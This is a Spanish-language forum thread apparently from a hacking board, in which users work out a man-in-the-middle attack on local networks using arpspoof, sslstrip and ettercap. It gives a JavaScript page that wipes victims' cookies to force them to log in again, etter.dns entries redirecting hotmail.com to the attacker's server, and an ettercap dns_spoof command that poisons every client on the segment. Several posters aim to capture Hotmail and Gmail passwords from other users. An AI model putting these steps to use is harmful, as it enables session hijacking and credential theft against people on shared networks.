Autor
|
Tema: sslstrip & arpspoof (cerrar conexión) (Leído 17,486 veces)
|
adastra
Endless Learner
Ex-Staff
Desconectado
Mensajes: 885
http://thehackerway.com/
|
Vale, es básicamente lo que dices, búscar el mecanismo para limpiar las cookies, se me ocurre esta otra idea. Partiendo de lo que te explique antes, rediriges a otra dirección controlada por ti con dnsspoof, pero en lugar de usar SET, utilizas un servidor web con apache y PHP, redireccionas a una página que lo que hace es simplemente, limpiar todas las cookies del navegador de la víctima y una vez hecho esto, redirecciona al sitio que solicito originalmente. Esa opción, seguro que funciona, vamos que esta vez si es la definitiva, jajajaja. ya que tu problema es la cookie de las narices que esta en el navegador del usuario, para ello, limpiar las cookies del navegador con PHP (o ASP, JSP, Servlets con lo que quieras). Ya casi lo tienes solamente necesitas "retoques". Luego, para que funcione para todos los hosts en el segmento de red, no debes especificar la opción "-t" en arpspoof. Esto envenenará todos clientes! Fijate en esto: http://linux.die.net/man/8/arpspoof
|
|
|
En línea
|
|
|
|
rigg
Desconectado
Mensajes: 10
|
Pues hola de nuevo gente, he estado realizando pruebas y puedo decir que han sido bastante positivas. Alguna pega tiene pero todo es cuestión de ir depurando, aunque tambien puedo decir que no es facil de detectar. Comienzo por el principio y no me enrrollo... El principal problema era que a la hora de esnifar datos de la red una vez envenenada era que aquellos clientes que tuviesen iniciada una sesión por ejemplo en su correo de Hotmail no podremos capturar sus datos ya que ya estaban introducidos cuando empezamos a esnifar. ¿Solución?. Hacer que la sesión se pierda. Para ello lo primero es eliminarle las "cookies" a nuestros cliente/s. Simplemente redirigimos todo el tráfico a una página que nosotros mismos creamos "sin contenido visible" a la cual le insertamos los siguientes códigos: //Para redirigir de nuevo a la página donde se encontraba el cliente //Le damos 1 seg, tiempo suficiente para que se ejecute el código que me elimina las cookies
<META HTTP-EQUIV="REFRESH" CONTENT="5;URL=javascript:window.history.back();">
//Código en javascript que me elimina las cookies
<body > <script language="javascript" type="text/javascript"> if (document.cookie != "") { if (confirm("Eliminar todas las Cookies?")) { la_cookie = document.cookie.split("; ") fecha_fin = new Date fecha_fin.setDate(fecha_fin.getDate()-1) for (i=0; i<la_cookie.length; i++) { mi_cookie = la_cookie[i].split("=")[0] document.cookie = mi_cookie + "=;expires=" + fecha_fin.toGMTString() } document.write("Se han eliminado: " + la_cookie.length + " Cookies ") } } </script> </body> Y listo. ¿Cual es el resultado? EL cliente cuando navega en el momento que nosotros empezamos a esnifar la red y por tanto la redirección, cuando haga un click sobre la página que está o intente navegar verá una página en blanco durante 1 seg (igual que cuando navegamos de forma normal al cargar una nueva página) y después volverá a la que se ha solicitado con la salvedad de que se ha ejecutado durante ese segundo un código que le ha roto la sesión. A partir de ahí a divertirse.... !!!!!! Lógicamente seguiré probando para que todo el proceso sea más invisible pero es el paso funcional que he podido dar.
|
|
|
En línea
|
|
|
|
adastra
Endless Learner
Ex-Staff
Desconectado
Mensajes: 885
http://thehackerway.com/
|
Me alegra que te haya funcionado lo de la solución, solamente que no hace falta que pongas "document.write" solamente redireccionar y ya esta... al final era sencillo Un Saludo.
|
|
|
En línea
|
|
|
|
rigg
Desconectado
Mensajes: 10
|
Sí sí lo se. lo que pasa es que lo puse para probar que realmente pasaba por esa página y ejecutaba el código.
|
|
|
En línea
|
|
|
|
rigg
Desconectado
Mensajes: 10
|
Tambien he notado una cosa adastra y es que si me conecto mediante eternet (eth0), los clientes wifi (wlan0) no puedo envenenarlos porque no los veo. No aparecen. No me parece muy normal, pero así es. Ahora estoy tratando de profundizar más y me planteo otra situación: 1 servidor (controlador de dominio) el cual tiene varios clientes. 1 Microsoft Isa Server (todo el tráfico de estos clientes pasan por el). En este caso el que hace de MITM es el Isa Server por lo que digo que si habrá alguna forma de poder hacer lo mismo. Es decir esnifar los datos. Como poder se debe de poder porque todo el trafico pasa por el.
|
|
|
En línea
|
|
|
|
adastra
Endless Learner
Ex-Staff
Desconectado
Mensajes: 885
http://thehackerway.com/
|
Si, lo que pasa es que tienes que realizar 2 envenenamientos, 1 para los clientes ethernet y otros para la wifi, en cada caso especificas la interfaz con arpspoof -i eth0/wlan0 no puedes envenenarlos a todos de golpe, ya que se debe especificar una sola interfaz a la vez, por eso tendrás que abrir dos consolas y cada una envenenar a sus correspondientes clientes, el resto del procedimiento es el mismo. Por otro lado, desde windows para hacer un envenanamiento, lo puedes hacer con "Cain y Abel" no es un programa que haya usado mucho porque soy usuario de Linux y con windows he trabajado más bien poco, pero he comprobado que con "Cain y Abel" puedes hacer las mismas operaciones de "ARP Poisoned/ARP Spoofing" que puedes hacer con dsniff o ettercap.
|
|
|
En línea
|
|
|
|
rigg
Desconectado
Mensajes: 10
|
Gracias adastra,
el programa Cain & Abel lo conocia. Sirve para hacer MITM, es decir hacer que todo el tráfico pase por el. Lo decía ya que como el ISA Server es lo mismo ya que es una especie de proxy avanzado en el cual se puede gestionar toda la red no se si existe algun script o filtro para poder leer ese trafico en concreto el HTTPS que es lo que me haría falta, pero con el Isa Server se gestiona todos los clientes, puertos, etc...
|
|
|
En línea
|
|
|
|
wuser
Desconectado
Mensajes: 3
|
Aprovecho este hilo para preguntaros una duda acerca del sslstrip. He probado varios procedimientos para pillar usuario y password de gmail con el sslstrip (con mi cuenta, solo para aprender), y ni usando ettercap ni usando solo sslstrip+ip forward+iptables+arpspoof lo consigo. El problema es que todo funciona ok, el equipo victima esta envenenado ok y navegando, y el sslstrip funcionando y a la espera en el equipo atacante. En cuanto me meto en gmail con firefox 8 en el equipo victima, empiezan a salir errores extraños en el ssltrip v0.9 (excepciones) y no se lee nada en el log, esto es, no pone nada de user y password, aunque se ven cosas. Uso el Backtrack 4 final. ¿Alguien me podria decir los pasos exactos para conseguirlo con esa distro? He seguido muchos tutoriales, y ninguno me ha funcionado.
|
|
|
En línea
|
|
|
|
iancrowley
Desconectado
Mensajes: 2
|
tengo el mismo problema!!!!
error L3 con ettercap.. hoy intente solo con arpsoof pero no pasa nada.. porfavor avisame si lograste resolver el problema
|
|
|
En línea
|
|
|
|
thedevilini
Desconectado
Mensajes: 52
|
Hola a todos los que han comentado esta pregunta, la Conclusión fue muy buena (la de controlar una pagina que contenga un codigo que elimine las cookies) ... alguien de ustedes puede decirme ¿cual es la forma correcta para hacerlo? ... veran les cuento lo que hago... (no me ha funcionado, asi que agradeceria que me dijeran: ¿que es lo que hago mal? o ¿que me falta hacer? ... COMIENZO modificando el fichero "index.html" ubicado en: " root/var/www " (obiamente mis intenciones son las de hacer un servidor apache con el codigo funcional antes mencionado: <META HTTP-EQUIV="REFRESH" CONTENT="5;URL=javascript:window.history.back();"> //Código en javascript que me elimina las cookies <body > <script language="javascript" type="text/javascript"> if (document.cookie != "") { if (confirm("Eliminar todas las Cookies?")) { la_cookie = document.cookie.split("; ") fecha_fin = new Date fecha_fin.setDate(fecha_fin.getDate()-1) for (i=0; i<la_cookie.length; i++) { mi_cookie = la_cookie .split("=")[0] document.cookie = mi_cookie + "=;expires=" + fecha_fin.toGMTString() } document.write("Se han eliminado: " + la_cookie.length + " Cookies ") } } </script> </body>
Lo copio y lo pego tal cual esta... Despues voy a: " backtrack,services,HTTPD,apache_start " (para activar un servidor apache) cabe mencionar que borro las 2 carpetas que estan en la misma ubicacion que el "index.html" con la intencion de que no estorben en la apertura de la pagina... paso seguido procedo a modificar la tabla dns abriendo una consola y tecleando : #locate etter.dns #nano /usr/share/ettercap/etter.dns ya que me abre la tabla dns, procedo a sustituir las direcciones ip que estan ahi indicadas, por la mia (en la que ahora esta corriendo el servidor apache con el codigo para borrar las cookies)... y como la pagina que quiero cerrar es la de hotmail, me que da de la siguiente manera... :
# microsoft sucks # redirect it to www.linux.org #
hotmail.com A MI_DIRECCION_IP *.hotmail.com A MI_DIRECCION_IP www.hotmail.com PTR MI_DIRECCION_IP # Wildcards in PTR are not allowed
guardo los cambios y procedo a ejecutar : "ettercap -T -q -i wlan0 -P dns_spoof -M arp // // "
EN RESUMEN: lo que hice fue crear un servidor apache con el codigo para borrar las cookies antes indicado, despues Hacer un envenenemiento dns para reedirigir hotmail al servidor apache... lamentablemente no he tenido muy buenos resultados... ¿Podrian ayudarme? muchas gracias...
|
|
|
En línea
|
|
|
|
|
Mensajes similares |
|
Asunto |
Iniciado por |
Respuestas |
Vistas |
Último mensaje |
|
|
La mejor forma de cerrar una conexión
Bases de Datos
|
dimitrix
|
3
|
3,134
|
16 Mayo 2011, 12:49 pm
por dimitrix
|
|
|
¿como cerrar conexiones para usar sslstrip?
Hacking
|
thedevilini
|
5
|
5,292
|
5 Enero 2012, 23:45 pm
por adastra
|
|
|
ARPSPOOF me deja sin conexion a internet
Hacking
|
luza
|
0
|
2,976
|
18 Diciembre 2012, 05:42 am
por luza
|
|
|
ARPspoof + SslStrip
Hacking
|
karrax
|
7
|
6,943
|
18 Agosto 2014, 12:36 pm
por faddlenope
|
|
|
ayuda con arpspoof y sslstrip.
Hacking
|
passgpc
|
2
|
3,072
|
27 Octubre 2015, 03:34 am
por passgpc
|
|